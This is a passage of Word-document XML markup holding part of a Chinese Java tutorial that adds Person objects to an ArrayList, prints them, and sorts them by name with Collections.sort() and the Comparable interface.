          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>动态数组</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>ArrayList&lt;Person&gt; list = new ArrayList&lt;Person&gt;();</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>添加对象到</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>list.add(new Person("ccc", 20));</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>list.add(new Person("AAA", 30));</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>list.add(new Person("bbb", 10));</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>list.add(new Person("ddd", 40));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">c) </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接着，我们打印出</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的全部元素。如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>打印</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的原始序列</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>System.out.printf("Original sort, list:%s\n", list);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">d) </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>然后，我们通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Collections</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sort()</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>函数，对</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行排序。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口，因此通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sort()</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>排序时，会根据</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>支持的排序方式，即</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> compareTo(Person person) </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>所定义的规则进行排序。如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>进行排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这里会根据</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>实现的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Comparable&lt;String&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>进行排序，即会根据</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“name”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>进行排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Collections.sort(list);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>System.out.printf("Name sort, list:%s\n", list);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
